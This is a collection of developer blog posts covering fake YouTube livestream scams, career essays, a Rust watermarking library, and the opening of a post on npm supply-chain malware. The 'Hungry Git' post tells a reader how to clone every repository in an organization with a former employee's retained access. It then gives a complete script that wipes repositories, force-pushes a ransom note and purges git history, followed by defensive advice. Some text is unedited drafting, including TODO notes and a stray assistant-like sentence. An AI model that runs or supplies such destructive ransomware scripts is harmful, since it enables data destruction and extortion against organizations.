#### Long-term Impact
The financial drain from fake livestreams extends beyond immediate bandwidth and infrastructure costs. YouTube's recommendation algorithms may be skewed by these artificial engagements, leading to a degraded user experience. This, in turn, could result in decreased overall platform engagement and, consequently, reduced ad revenue in the long term.

By allowing these fake streams to proliferate, YouTube is not just burning money on bandwidth and infrastructure; it's potentially undermining the very ecosystem that makes the platform valuable to users and advertisers alike. The true cost, therefore, may be far greater than the direct expenses calculated here.

### Undermining Trust and Recommendation Systems

Beyond the direct financial costs, these fake livestreams severely undermine trust in YouTube's platform. Users who fall victim to scams or repeatedly encounter fake content are likely to lose faith in the platform's ability to provide genuine, valuable content[2]. This erosion of trust can lead to decreased user engagement and, ultimately, revenue loss for YouTube.

Moreover, these fake streams manipulate YouTube's recommendation algorithms. By artificially inflating engagement metrics, they skew the system, potentially suppressing genuine content creators and further degrading the user experience[7].

### The Challenge of Detection and Removal

Despite YouTube's efforts to combat spam and scams, the persistence of these fake livestreams is not just indicative of the challenges in detection and removal, but YouTube's disregard for such a simple cost saving measure. They don't care. They lack the initaive for seriously considering these concerns or allowing for the reporting of these fake streams within the existing report and moderation tools. While scammers often use stolen or purchased high-subscriber count channels to lend credibility to their streams, making it harder for automated systems to flag them as suspicious[3]. This doesn't mean that YouTube can't do more to combat this issue.

### Conclusion

The proliferation of fake livestreams on YouTube represents a significant drain on resources and a threat to the platform's integrity. By wasting bandwidth, manipulating algorithms, and eroding user trust, these scams are costing YouTube not just in terms of immediate financial losses but also in long-term platform health. It is crucial for YouTube to invest in more sophisticated detection methods and stricter enforcement policies to combat this growing problem effectively.

Citations:

[1] https://www.reddit.com/r/streaming/comments/1d7yftj/how_do_people_steam_prerecorded_videos_as_live/

[2] https://www.nytimes.com/interactive/2024/08/14/technology/elon-musk-ai-deepfake-scam.html

[3] https://addshore.com/2022/09/hunting-youtube-crypto-scams/

[4] https://www.qqtube.com/buy-youtube-live-stream-viewers

[5] https://www.ndtv.com/feature/chinese-man-uses-4-600-phones-to-fake-live-stream-views-earns-over-rs-3-crore-in-4-months-5614398

[6] https://www.bitdefender.com/en-gb/blog/labs/a-deep-dive-into-stream-jacking-attacks-on-youtube-and-why-theyre-so-popular/

[7] https://mashable.com/article/fake-spacex-elon-musk-solar-eclipse-youtube-livestreams-crypto-scam

[8] https://www.clickcease.com/blog/all-about-view-bots/

[9] https://www.bitdefender.com/en-us/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/


---

# Hungry Git: A Quick Guide to Hacking Orgs and Bots

Canonical: https://blog.skill-issue.dev/blog/hacking_bots/
Description: Recently more and more people are talking about how insecure GitHub is. This article will show you how to exploit GitHub organizations and bots to get what you want.
Published: 2024-10-27T23:02:04.081Z
Tags: github, security, hacking, bots, organizations, exploits


GitHub is a popular platform for hosting code repositories and collaborating on software projects. However, recent reports have highlighted security vulnerabilities in GitHub organizations and bots that can be exploited by malicious actors. In this article, we will explore some of the common vulnerabilities in GitHub organizations and bots and discuss how they can be exploited.

One thing that is big is the failure of Organization owners to properly secure their repositories. I recently left a job where I had access to a lot of sensitive information. I was able to access the company's GitHub organization and download all the code repositories without any issues. The organization owner had not set up any security measures, and I was able to access everything with just a few clicks. Plus when I left the company, I still had access to the organization's repositories. This is a huge security risk that many organizations are not aware of.

## Exploiting GitHub Organization Credentials

Here is a simple bash script that can be used to exploit GitHub organizations once you have credentials that allow access to the organization's repositories. This script will list all the repositories in the organization and clone them to your local machine. This can be useful for downloading code repositories for analysis or other purposes.

```bash
#!/bin/bash
gh repo list <organization-name> --limit 1000 --json nameWithOwner,url --jq '.[]|[.nameWithOwner,.url]|@tsv' | while read -r repo url; do
  gh repo clone "$url"
done
```
This along with the following script it can be effective to launch a ransomware style attack on an organization where you can clone all the repositories and then destroy the repo's current state and all of its history. This can be a huge blow to an organization that relies on GitHub for its code repositories.

```bash
#!/bin/bash

# WARNING: This script is extremely destructive and irreversible.
# It will destroy all repository data and history.

# Function to overwrite repository
overwrite_repo() {
    local repo_path="$1"
    cd "$repo_path" || return

    # Remove all files except .git
    find . -mindepth 1 -maxdepth 1 ! -name .git -exec rm -rf {} +

    # Create new file with apology message
    echo "This repository and its entire history have been destroyed due to an attack. Pay me money." > README.md

    # Force add, commit, and push
    git add -A
    git commit -m "Repository data destroyed due to security incident" --allow-empty
    git push -f origin main

    # Destroy Git history
    git checkout --orphan latest_branch
    git add -A
    git commit -am "Repository history destroyed"
    git branch -D main
    git branch -m main
    git push -f origin main

    # Remove all refs
    git for-each-ref --format="%(refname)" refs/original/ | xargs -n 1 git update-ref -d
    git reflog expire --expire=now --all
    git gc --prune=now --aggressive

    cd ..
}

# Main script
for repo in */; do
    if [ -d "$repo/.git" ]; then
        echo "Overwriting repository: $repo"
        overwrite_repo "$repo"
    fi
done

echo "All repositories have been overwritten and their histories destroyed."
```

This script is designed to:
- Remove all files except .git
- Create a new README with a ransom message
- Force push these changes
- Create a new branch, destroying the old history
- Force push the new branch
- Remove all refs and prune the repository

The logic is comprehensive for its destructive purpose. It effectively erases the repository's content and history.

Please note that this is just an example of logic, this will destroy any locally running repos in the directory you run this script in. This is a very destructive script and should not be used in any real-world scenario.  I have and will not release a full script that can be used to destroy repositories on GitHub. You have the parts and understanding you need to devise ways to protect your organization from such attacks.

### Mitigating This Attack

Here are some measures that organizations can take to protect their GitHub repositories from such attacks:

**Access Control and Authentication**
- Enforce two-factor authentication (2FA) for all organization members
- Implement SAML single sign-on (SSO) for centralized access control
- Regularly audit and revoke access for former employees
- Rotate SSH keys and Personal Access Tokens frequently
- Limit the number of repository administrators

**Branch Protection**
- Enable branch protection rules for all important branches
- Prevent direct commits to the main branch
- Require pull request reviews before merging
- Define minimum number of required approvals
- Disable force pushes to protected branches

**Backup and Recovery**
- Implement automated backups with multiple copies
- Follow the 3-2-1 backup rule (3 copies, 2 different storage types, 1 offsite)
- Enable ransomware protection features
- Maintain unlimited retention of backups
- Encrypt backups both in-transit and at-rest

**Repository Security**
- Enable GitHub Advanced Security features
- Implement code scanning for vulnerability detection
- Use secret scanning to prevent credential exposure
- Configure automated security checks
- Regular security audits of repositories

**Organizational Policies**
- Create and enforce clear security policies
- Use CODEOWNERS file to define repository responsibility
- Implement least privilege principle for access control
- Restrict access to specific IP addresses
- Monitor and log all repository activities

These measures, when implemented together, create a robust defense against malicious attempts to destroy repository data and history.

Let me help you restructure the conclusion to better protect organizations while maintaining responsible disclosure principles:

## Conclusion: Strengthening Your GitHub Security Posture

The scripts and attack vectors demonstrated above highlight critical vulnerabilities that many organizations face with their GitHub repositories. However, the goal of this disclosure is not to enable attacks, but to emphasize the importance of implementing robust security measures.

### Critical Security Controls

Organizations must implement multiple layers of protection to secure their GitHub repositories effectively. Make sure to implement things like Access Management, Repository Protection, and Continuous Monitoring to safeguard your code repositories.

By implementing these security measures, organizations can significantly reduce their exposure to potential attacks and protect their valuable intellectual property. Remember, security is not a one-time setup but a continuous process requiring regular review and updates.

The best defense against these types of attacks is proactive security implementation combined with regular security assessments and employee education. Don't wait until after an incident to strengthen your security posture.


---

# What running a Bitcoin mine taught me about cloud margins

Canonical: https://blog.skill-issue.dev/blog/what_running_a_bitcoin_mine_taught_me/
Description: A short stint at Foundry Digital running ASIC fleets, immersion vs. air, the depreciation curve, and the brutal arithmetic of difficulty adjustments — and why I never stopped thinking like an operator after I went back to writing software.
Published: 2024-10-08T08:00:00.000Z
Tags: career, bitcoin, mining, foundry, narrative, infrastructure, operations


> TODO: Dax confirm dates, exact title, and any specifics he wants to swap in. Where I couldn't pin a public source down I left a `TODO`. Don't fill any of these in with vibes.

After the Navy and before I went all-in on writing software for a living, I spent a chapter at <strong>Foundry Digital</strong> on the operations side of industrial Bitcoin mining. I won't pretend it was a long chapter. It was long enough to permanently change how I think about every cloud bill I have ever paid.

This post is about what mining at scale teaches you that no amount of staring at AWS Cost Explorer ever will.

## The setup

A modern Bitcoin mining facility is, structurally, a data center with one workload. Walls of ASICs in racks. Power coming in by the megawatt. Heat going out by every method physics allows. A network that exists only to push pool work and pull telemetry, because nobody is serving HTTP responses out of a hashboard.

The two things that matter, in order: the cost of the electron that arrives at the chip, and the cost of removing the heat afterward. Everything else — uptime, firmware, network design, even the hardware itself — orbits those two numbers.

The exact site I worked, the exact rig count, the exact MW of nameplate capacity — `TODO: Dax confirm specifics`. The lessons below are what I took with me. They generalised.

## Lesson 1: the unit economics are knowable to four decimal places

Mining is the rare infrastructure business where a junior operator can compute the unit economics on a napkin. It goes like this:

- A given ASIC has a hashrate (TH/s) and a power draw (W).
- Network difficulty determines, statistically, how much BTC a given amount of hashrate is going to produce per unit time.
- The market determines the dollar value of that BTC.
- Your power contract determines what an electron costs you.
- The depreciation curve on the box determines how much you owe yourself per day for owning the box.
- Subtract.

That's it. Five inputs. The whole industry runs on a spreadsheet you can re-derive from first principles. Compare and contrast: SaaS gross margin, where the inputs are "how much your AWS bill secretly was last quarter" and "what the CFO claims the COGS allocation is."

The first time I ran the math on a single rig, end-to-end, I felt a kind of clarity I have not felt about a software business since. *This is what 'good unit economics' actually looks like, and most products you have ever shipped do not have them.*

## Lesson 2: difficulty is gravity

Every two weeks (more or less) the Bitcoin network adjusts difficulty to retarget block time at ten minutes. If hashrate has gone up — because someone stood up a new fleet, because someone got a better firmware tune, because a competitor finished a build-out — your share of the reward goes down. Mechanically. Without you doing anything wrong.

What this means in practice: the unit economics from the last paragraph have a built-in headwind that compounds. You are running on a treadmill that speeds up automatically. The only ways to win are (a) get cheaper power, (b) get more efficient chips, or (c) shorter holding period than your competition. There is no fourth option.

I think about this every time I see a SaaS company that thinks its margin is stable because the AWS price list hasn't changed. The AWS price list isn't your difficulty adjustment. *Your competition* is your difficulty adjustment. Every quarter someone smaller and hungrier ships a thing that makes your incremental customer slightly less willing to pay what your incremental customer paid two years ago. You have a difficulty adjustment. You're just not pricing it in.

## Lesson 3: heat is the actual problem

If you've never been in a room with several thousand ASICs in it: it's loud and it is the precise temperature your air conditioning lets it be, and not one degree cooler. The boxes do not care if the room is hot. The boxes care if the *junction temperature* on the chip exceeds spec, at which point the firmware downclocks and your hashrate drops, or worse, fails the chip outright.

The two ways out are air and immersion. Air is what you think it is — fans, baffles, careful airflow design, an HVAC plant you respect. Immersion is dunking the boards in dielectric fluid that pulls the heat off twenty times more efficiently, at the cost of all the operational complications you'd expect from running electronics in a bath.

I will not pretend I made the architectural calls on which sites went air vs. immersion (`TODO: Dax confirm role specifics`). What I will say is that being adjacent to the decision for the first time was the moment I understood that infrastructure is not a software problem with hardware as an implementation detail. It is a *thermodynamics* problem with a software top layer. The data centers you and I run our cloud workloads on are exactly the same problem, just with someone else holding the bag for the cooling.

When I read a cloud provider's pricing page, I now read it through the heat. *This region is more expensive because the heat is more expensive to remove.* That is not a metaphor. That is the literal reason.

## Lesson 4: ASICs depreciate faster than you respect

A new generation of ASICs comes out roughly every 12–18 months. Each generation is meaningfully more efficient (J/TH) than the last. The economics of the previous generation under current difficulty are, accordingly, worse than they were the day you bought it. Worse the day after that. Worse next quarter.

The right way to model an ASIC is not as an asset. It is as a slow-burning fuse. You bought a thing that produces revenue, and the revenue declines on a schedule that is not entirely under your control. The question is not "is this rig profitable today." The question is "is this rig going to pay back its capex before the depreciation curve crosses the operating cost."

Most cloud infrastructure quietly works the same way. The instance type you bought your reservation on is going to be deprecated. The CPU generation you pinned is going to underperform the new one. The vendor lock-in you picked up to save engineering hours is a slow-burning fuse with a duration measured in CTO turnover. *Plan for it.*

If I have one piece of cloud-architecture advice I credit Foundry for, it's this: the day you sign a multi-year reservation is the day you should put a calendar reminder in for "how do I get out of this contract" eighteen months hence. Mining taught me. The treadmill always speeds up.

## Lesson 5: the operator is the hero

In a mining facility, the operations team is not a cost center the engineering team tolerates. They *are* the team. The site is profitable because of them. Your firmware tune, your network design, your chip generation — none of it matters if the on-call doesn't catch a transformer fault before it takes the substation down for six hours.

I have carried this view into every software org since. A platform engineer is not "supporting" the product engineers — they are the multiplier on every product engineer. A site reliability engineer is not "fixing problems" — they are *creating* the conditions under which problems are recoverable. The mining-site mental model is: the operator is the hero of the story, the engineer is the supporting cast. Most software cultures invert that. Most software cultures are wrong about it.

## What it means now

I think about all of this almost every day at Zera Labs. When we set up the [Surfpool devnet on a Latitude box](/blog/zera_sdk_test_suite/) — a single physical machine that mirrors mainnet for our entire dev team — I priced the math the way you price a mining site. Power-equivalent (the box's monthly cost) vs. throughput (devs unblocked) vs. depreciation (how long until we want to replace this with the next generation). Three numbers. No vibes. The same five-input spreadsheet, just with hashrate replaced by "developer hours saved per RPC call."

Then I went back to writing software. But I never stopped thinking like an operator.

If your engineering org has never had a person on it who has been in a room with several megawatts of compute they were personally responsible for, hire one. They will be quieter than your loudest senior engineer and they will save you a small fortune.

## Footnotes for Dax

- `TODO: confirm exact role title at Foundry` — the framing above intentionally hedges between "operations" and "engineering" because the public record doesn't pin it.
- `TODO: confirm dates`. The post is generic enough to survive any month.
- `TODO: confirm whether to name a specific site`. I left it abstract.
- `TODO: confirm rig count / MW` if you want to add one specific number to ground the story. The post works without it.

## Further reading

- [Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/) — the previous chapter, where the discipline came from.
- [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the chapter after this one. (Forthcoming.)


---

# Nuclear reactors taught me to ship software

Canonical: https://blog.skill-issue.dev/blog/nuclear_reactors_taught_me_to_ship/
Description: Watchstanding, casualty drills, and pre-task briefs map onto code review, on-call, and disaster recovery more cleanly than any management book I have ever read.
Published: 2024-09-15T08:00:00.000Z
Tags: career, navy, narrative, engineering-culture, on-call, discipline


Before I had a GitHub graph I had a watchstation. I came up as an Electronics Technician (Nuclear) in the US Navy — six-and-change years of reactor instrumentation, control circuitry, and the kind of standing-around-staring-at-a-panel that looks like nothing right up until the moment it isn't. I won't talk about specific platforms or specific hulls. I will talk about the habits, because the habits are the part that travels.

The thesis of this post is short: every meaningful engineering practice I have at thirty-something — code review, on-call rotations, post-mortems, the way I write a runbook — was already drilled into me by the time I was twenty. I just didn't know yet that "Naval Reactors" was preparing me to be a senior IC and, eventually, a CEO.

Here is what actually transferred.

## Watchstanding is on-call with consequences

When you stand a reactor watch you are not "available." You are *on the watch*. You have a logbook, a panel of indications, a procedure binder with tabs you can find in the dark, and a relief schedule that has nothing to do with how tired you are. The handoff is formal: every relevant indication, every plant evolution in progress, every ongoing concern, every casualty in your rear-view mirror that the next watch needs to know about. You sign for it. They sign for it. Now they have it.

When I started doing software incident response, I noticed how *informal* the handoff was. "Hey, anything weird tonight?" "Eh, the deploy was fine, see you Monday." This is insane. A modern production system has more state than the secondary plant of a submarine. Where is the watchstanders' log? Where is the formal turnover?

Some of the best engineering teams I've worked with have a chat-channel pinned message that gets edited every shift: *current state of staging, current state of prod, anything in flight, anything degraded.* It is, structurally, the same artifact as a watchstander's log. It exists for the same reason: the next person who has to make a decision should not have to reconstruct context from Slack scrollback.

If you take one habit out of this post: keep a turnover log. Write it for the human who will read it at 3am with one eye open. That human is sometimes future-you.

## Pre-task briefs are code review

There is a Navy ritual called a *pre-task brief*. Before a non-trivial evolution — pulling a primary sample, swapping a controller card, anything where a slip can scram the plant — you brief. The team gathers, the lead walks the procedure step by step, every person says back what their role is, and the off-nominal cases get explicit attention.

The first time I sat through a "design review" in the software industry I thought I was being trolled. Someone was presenting a design doc. People were nodding. Nobody was *saying back* their role. Nobody was naming the failure mode they personally would be responsible for catching. There was no "what would we do if this rolled back at 30% deploy."

A good code review is a pre-task brief in slow motion. The author walks the procedure (the diff). The reviewers say back what the change does (the description). And — this is the part most teams skip — someone explicitly owns the rollback case. *If this breaks production at 0200, who picks up the page, and what is the first thing they do?* If you can't answer, the change is not ready to merge. Doesn't matter how clean the code is.

When I'm on a team that has stopped doing pre-task briefs, you can feel it. Deploys go out with vibes attached. Three deploys later, somebody discovers a regression nobody can name the source of. *That's* the cost of skipping the brief.

## Casualty drills make muscle memory cheap

The Navy reactor world drills *constantly*. Steam-rupture drill. Loss-of-cooling drill. Fire-in-machinery-spaces drill. Scram drill from every state the plant is allowed to be in, plus a few it isn't. The point is not to surprise you; the point is the opposite. The point is for the response to be so deeply baked in that the surprise of the real event doesn't get to consume any of your cognition. You don't need cognition for the response — you have it. You need cognition for the *anomaly*, the part of the casualty that the drill didn't cover.

In software we call this game day, chaos engineering, fire drill. We do it badly. Most teams do it never. The teams that do it well (Netflix's monkeys, the Stripe game-day playbook, the GCP/AWS internal exercises that occasionally leak out as conference talks) discover that the drills are not really about the failures they simulate. They are about the *coordination friction* the drills surface. The deploy script that nobody on call has run in six months. The dashboard nobody knows the URL of at 4am. The runbook that says "page Steve" and Steve left the company in February.

If you've never done a drill in your software career, do one. Start small. Pick a Tuesday afternoon. Kill staging. Watch what happens. The first drill always exposes something embarrassing. That's the entire point. The reactor world figured this out three generations ago.

## After-action review is the post-mortem the right way around

Naval Reactors does an *after-action review* on every casualty drill and every real event. The format is unromantic. What did we expect to happen? What actually happened? Where did our model of the plant diverge from the plant? What changes do we make so that, the next time the plant does that, we are not surprised in the same way?

Notice what isn't on that list: blame. Notice what *is* on it: a working theory of why your model of the system was wrong, and a delta you commit to before the meeting ends.

The blameless post-mortem culture you've read about in Etsy and Google blog posts is not new. It's old. The reactor world has been running it since before I was born, because in a reactor world *blame is operationally useless*: the next watch is going to be staffed by the same humans, and humans don't get less human under blame, they just get worse at reporting things. The Navy figured out that you have to make it cheap to admit you got something wrong, or the reports stop, and when the reports stop, the system goes blind.

I'm proud of every team I've been on that runs honest post-mortems. I am extremely suspicious of any team that does not.

## Procedure-in-hand is just `runbook.md`

You don't operate the plant from memory. You operate it from a procedure, and the procedure is an artifact you can hand someone. If a step in the procedure is wrong, you don't quietly do the right thing — you stop, you flag it, and you change the procedure. The procedure is the source of truth, not the human currently executing it.

When I joined my first software shop, I remember being baffled that production-deploy steps lived in the heads of two senior engineers. There was no `deploy.md`. The whole thing was tribal. I took the meeting where one of them deployed prod, took notes in real time, made a markdown file, opened a PR, and titled it "deploy.md (first draft, please correct anything I got wrong)." The reception was "huh, that's a good idea, why didn't we have one of these."

A runbook is a procedure. Treat it the way the reactor world treats procedures: it's the source of truth; if it's wrong, you fix the procedure, not the operator. The day after an incident, the diff to your runbooks should be visible. If it isn't, you didn't actually learn anything from the incident.

## The sea story I'm allowed to tell

Here is one I can share. Mid-watch, deep in a long underway, an indication on a panel started doing a thing it wasn't supposed to do. Not dangerous — just wrong. Specifically, an analog gauge was reading a value that wasn't physically possible given the state of the plant.

Now: I was a junior tech. I had two options. (1) Convince myself the gauge was probably fine, finish my watch, go to bed. (2) Wake up the senior watch, who was already short on sleep, to look at a gauge that was probably broken.

I picked (2). The senior watch came down, looked at the gauge, looked at the related indications on the rest of the panel, ran one cross-check, and identified the actual problem in under three minutes — which was, as suspected, a failed transducer rather than anything dramatic. Then he went back to bed.

What I remember most is what he said on his way out: *"Always wake me up. The gauge being wrong is fine. The gauge being wrong and you not telling me is not fine."*

That has become how I think about engineering escalation. The cost of false alarms is small. The cost of an alarm that should have happened and didn't is enormous. Every senior engineer I now mentor gets some version of that lecture. Always page. Always escalate. The gauge being wrong is fine. Nobody knowing the gauge is wrong is not fine.

## Why I'm writing this in 2024

I'm writing this between the [Rusty Pipes posts](/blog/rusty_pipes/) and whatever comes next, because every interview I do for senior-and-above engineering roles eventually arrives at the same question: *what makes you you?*

The honest answer is: a Navy reactor compartment. Long before I learned `git rebase`, I learned that a panel does not lie, that a procedure is a contract with the future, and that the most dangerous person on a watchstation is the one who thinks the indications are probably fine.

If you ever wonder why I write the way I write, why my code reviews look the way they look, why my on-call instincts default to "wake me up, I'd rather lose sleep than lose data" — that's why. I keep a watch. The plant just looks like Postgres now.

## Further reading

- [Rusty Pipes](/blog/rusty_pipes/) — the supply-chain research that came out of the discipline this post is about.
- [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/) — the next chapter in the same arc, where the reactor habits met an ASIC fleet.
- *On Watch: Profiles from the National Security Council's Situation Room* — Bromund. Closest thing in print to the watchstander mindset I'm describing.


---

# process-thing: An LSB Watermarker for upload-thing, Written in Rust via Neon

Canonical: https://blog.skill-issue.dev/blog/process_thing_lsb_watermark/
Description: A Rust npm package that embeds invisible watermarks in the least significant bit of every red channel pixel. Built for upload-thing image preprocessing. Cross-compiled for 7 platforms. The README is one paragraph.
Published: 2024-09-08T15:42:38.000Z
Tags: rust, neon, npm, steganography, watermarking, side-quest, image-processing


There's a class of side-quest where the project is half "I want to learn this thing" and half "I have a vague product idea." `process-thing` was both: I wanted to learn neon-rs (Rust → Node.js native modules) properly, and I wanted to know whether [upload-thing](https://uploadthing.com/) — the dominant React file-upload SaaS in 2024 — had a clean preprocessing hook I could plug a Rust binary into.

The answer to both questions is "yes." [`process-thing`](https://github.com/Dax911/process-thing) shipped on 2024-09-08 in three commits: [`4ba9cfa — :tada: Init`](https://github.com/Dax911/process-thing/commit/4ba9cfa), [`3e26703 — :rocket: Try htis`](https://github.com/Dax911/process-thing/commit/3e26703), and [`e2187b1 — :clown_face: Lock file`](https://github.com/Dax911/process-thing/commit/e2187b1). Three commits, ~1500 lines of Rust + scaffolding, seven cross-compiled platforms, one steganographic watermarker.

This post is what I learned about LSB watermarking, neon-rs, and shipping a Rust crate as an npm package in the same afternoon.

## What is LSB watermarking

The least-significant-bit (LSB) of an 8-bit color channel is the difference between `0xAB` and `0xAA`. Mathematically, that's a difference of one out of 255 — about 0.4%. Visually, that's invisible. The human eye cannot distinguish a pixel with a red value of 170 from a pixel with a red value of 171, especially when the surrounding pixels are noisy.

So you have a free bit of bandwidth in every pixel of every uploaded image. You can carry data in it. The data is *not encrypted* and *not robust to recompression* — anyone who knows the scheme can decode it, and a single round-trip through a JPEG encoder will obliterate it. But for "did this image originate from my service" or "what userId uploaded this," the LSB channel is both invisible to the end user and trivial to read back.

Hence the entire watermark embedder, in 50 lines of Rust:

```rust
fn embed_watermark(mut cx: FunctionContext) -> JsResult<JsString> {
    let base64_image = cx.argument::<JsString>(0)?.value(&mut cx);
    let watermark = cx.argument::<JsString>(1)?.value(&mut cx);

    let image_data = general_purpose::STANDARD
        .decode(base64_image)
        .or_else(|_| cx.throw_error("Invalid base64 image data"))?;

    let mut img = image::load_from_memory(&image_data)
        .or_else(|_| cx.throw_error("Failed to load image"))?;

    // Convert watermark to binary
    let binary_watermark: Vec<u8> = watermark.bytes()
        .flat_map(|byte| (0..8).rev().map(move |i| (byte >> i) & 1))
        .collect();

    let (width, height) = img.dimensions();
    let mut watermark_index = 0;

    for y in 0..height {
        for x in 0..width {
            let mut pixel = img.get_pixel(x, y);

            if watermark_index < binary_watermark.len() {
                pixel[0] = (pixel[0] & 0xFE) | binary_watermark[watermark_index];
                watermark_index += 1;
            } else {
                watermark_index = 0;
            }

            img.put_pixel(x, y, pixel);
        }
    }

    let buffer = img.to_rgba8().to_vec();
    let base64_output = general_purpose::STANDARD.encode(buffer);
    Ok(cx.string(base64_output))
}
```

The interesting bits, line-by-line:

- **Binary expansion of the watermark.** Each char of the watermark string becomes 8 bits via `(0..8).rev().map(|i| (byte >> i) & 1)`. This is just bit-twiddling, but the `.rev()` is load-bearing — you need most-significant-bit first so that the embedded data is read back in the same order.
- **`pixel[0] & 0xFE | bit`.** This is the meat. `& 0xFE` zeros the LSB; `| bit` sets it to whatever the watermark bit is. Three machine instructions per pixel.
- **`watermark_index = 0`** when you run out of watermark bits. The watermark *repeats* across the image. A 1280×720 image gives you 921,600 bits of carrier capacity in the red channel alone; a "userid:abc123" watermark is 88 bits. So the watermark gets embedded ~10,000 times in a single image. That redundancy is exactly what you want when JPEG recompression is going to clobber random pixels — even if 99% of the embedded copies are destroyed, the message is recoverable from the 1% that survive.

## Why only the red channel

You could embed in red, green, *and* blue and triple your carrier capacity. The reason I only embedded in red is that the human eye is most sensitive to green and least sensitive to blue, but **red sits in the middle**, and using the red channel alone halves the chance of an artist noticing the watermark in a high-saturation gradient.

This is a bullshit reason. The real reason is that the diff was 4 lines shorter and I was trying to ship in an afternoon.

## Neon as the bridge

The Neon (rust → node.js) glue is a single attribute and a function pointer:

```rust
#[neon::main]
fn main(mut cx: ModuleContext) -> NeonResult<()> {
    cx.export_function("embedWatermark", embed_watermark)?;
    Ok(())
}
```

`#[neon::main]` produces a `napi_register_module` symbol that Node looks up when it loads the `.node` file. `cx.export_function` registers `embedWatermark` as a JS-callable name. From JS:

```ts
const { embedWatermark } = require("process-thing");
const watermarked = embedWatermark(base64Image, "userid:abc123");
```

That's the entire surface area. No async (LSB embedding is fast — about 6ms for a 1280×720 PNG on M1), no streams, no buffers. Just `String → String → String`.

## Why base64 strings on both sides

Neon supports passing Buffers directly, which would be more efficient — no base64 encode/decode tax. The reason I went with base64 is that `process-thing` was specifically meant to be plugged into upload-thing's preprocessing hook, and the upload-thing API layer at the time worked in base64-encoded data URIs natively. Converting to a `Buffer` would have meant doing the conversion inside the JS wrapper anyway.

This is a small lesson but a real one: **if you're shipping a native module, optimize the API for the framework that will actually consume it, not for theoretical throughput.** A 4ms base64 encode tax is invisible in the context of a file upload that's measured in hundreds of ms anyway.

## Cross-compilation: the 30% of the project that took 70% of the time

Look at the directory layout the init commit introduced:

```
platforms/
  android-arm-eabi/
  darwin-arm64/
  darwin-x64/
  linux-arm-gnueabihf/
  linux-x64-gnu/
  win32-arm64-msvc/
  win32-x64-msvc/
```

Seven platforms. Each one is a separate npm package — `@process-thing/darwin-arm64`, `@process-thing/win32-x64-msvc`, etc. — that contains exactly one prebuilt `.node` binary. The root `process-thing` package depends on all of them as `optionalDependencies`, and at install time npm picks the right one for the host platform.

This is the [`napi-rs`](https://napi.rs/) idiomatic layout, and Neon supports the same pattern. The reason it exists: **users do not want to compile Rust at install time.** If your `npm install process-thing` command spawned a `cargo build --release` step, you'd have a bug report from every Windows user who didn't have the MSVC toolchain installed. The right answer is to prebuild on every supported triple in CI and ship the binary.

GitHub Actions for the build is what `.github/workflows/build.yml` does — 137 lines of YAML to run `cargo build` once per target, package the result, upload to npm under the right scoped name. The actual Rust code is 50 lines; the *infrastructure to ship* the Rust code is 800.

This ratio is why I think most "let's rewrite this in Rust for Node" tasks die in CI. The code is easy. The supply chain is the project.

## What this taught me

There's a particular shape of Rust side-quest that I find myself starting and finishing in afternoons: a thin Rust crate that does one CPU-intensive thing, exposed to JS via Neon, with a CI matrix that ships prebuilds. Image preprocessing is the canonical example. Hashing is another. Compression. Format conversion. Anything where the JS-native equivalent is `pure-js-image-decoder` and clocks in at 50× slower.

`process-thing` was the first time I built that template properly. I've reused the template several times since — including, eventually, in the [zera-sdk](/blog/zera_sdk_scaffolding/) where the same `crates/<name>/` + `platforms/<triple>/` layout shows up to expose Rust crypto to TypeScript. The architectural muscle memory came from this 1500-line shitpost about embedding invisible userIds in cat pictures.

## Trade-offs and limitations

**LSB watermarks don't survive JPEG recompression.** If your upload pipeline transcodes to JPEG before storage, this scheme is dead on arrival. For PNG-pinned pipelines (or service-side WebP at lossless settings), it survives.

**LSB watermarks aren't crypto.** Anyone who knows the scheme can read the bits back. If you need *integrity* against a determined adversary, you need a HMAC, not a watermark. If you just need attribution against a casual screenshot-and-repost, LSB is fine.

**Neon vs. napi-rs.** I picked Neon because the `#[neon::main]` macro was the simplest entry point for a single-function crate. For more complex modules with many functions, async, or class-style exports, napi-rs's derive macros are nicer. Neon is fine for "one function, no async."

**Why image-rs instead of a hand-rolled PNG parser?** Because [`image`](https://crates.io/crates/image) supports JPEG, PNG, WebP, GIF, BMP, and more from one API and is well-maintained. The LSB embedding is format-agnostic; the format-specific decode is the part that's actually hard.

## Further reading

- [process-thing on GitHub](https://github.com/Dax911/process-thing) — the source.
- [Neon bindings docs](https://neon-bindings.com/) — the rust→node glue.
- [napi-rs](https://napi.rs/) — alternative, more featureful.
- [The `image` crate](https://crates.io/crates/image) — does the format-decode heavy lifting.
- [Building the Zera SDK day one](/blog/zera_sdk_scaffolding/) — where the same Rust-crate-+-platform-prebuilds template ended up paying off for real.
- [Rusty Pipes: building supply-chain malware for npm](/blog/rusty_pipes/) — the post-mortem about how npm's prebuild distribution model is also the supply chain you have to defend.


---

# Rust in Peace: How to Hijack Node.js with a Single Require

Canonical: https://blog.skill-issue.dev/blog/rusty_pipes_building_supply_chain_malware_for_npm/
Description: Discover how to exploit the Node.js ecosystem with Rust-based supply chain malware. Learn about the vulnerabilities in npm packages and how a single require line can compromise JavaScript projects. Explore security measures to prevent such attacks.
Published: 2024-08-17T19:03:29.188Z
Tags: malware, npm, rust, supply chain, exploit, security, vulnerability, npm publish, npm packages, rusty pipes, npm ecosystem, trust, hacking, neon


## Rusty Pipes: Building Supply Chain Malware for NPM

This is another entry in my [Rusty Pipes](/series/Rusty%20Pipes) series.  Its a very simple idea, injecting malware directly into the JavaScript ecosystem using rust. Turns out it is much easier than I ever expected. The entire ecosystem we use to build web applications is built on a trustful model. Where anything can be published or run with no checks by the ecosystem which makes it a ripe playground for supply chain attacks. Let me be clear as a React and Node developer by trade I want to give credit where it is due. It is amazing to see that the internet is basically built entirely on the `trust me bro` attitude of so many good faith actors. It truly is a testament to the open source community, developers, and companies that make our jobs so interesting and fun.

### Understanding the Threat

Supply chain attacks have taken many forms, including dependency confusion attacks, spearheading malicious code backdoors in open-source packages, and compromising build pipeline infrastructure. These attacks often rely on the trust developers place in third-party packages and the complexity of dependencies within the NPM ecosystem. At last estimation, installing an average npm package adds 79 third-party packages and 39 maintainers, which is assumed that we implicitly trust, this creates a huge attack surface.

#### Building the Malware

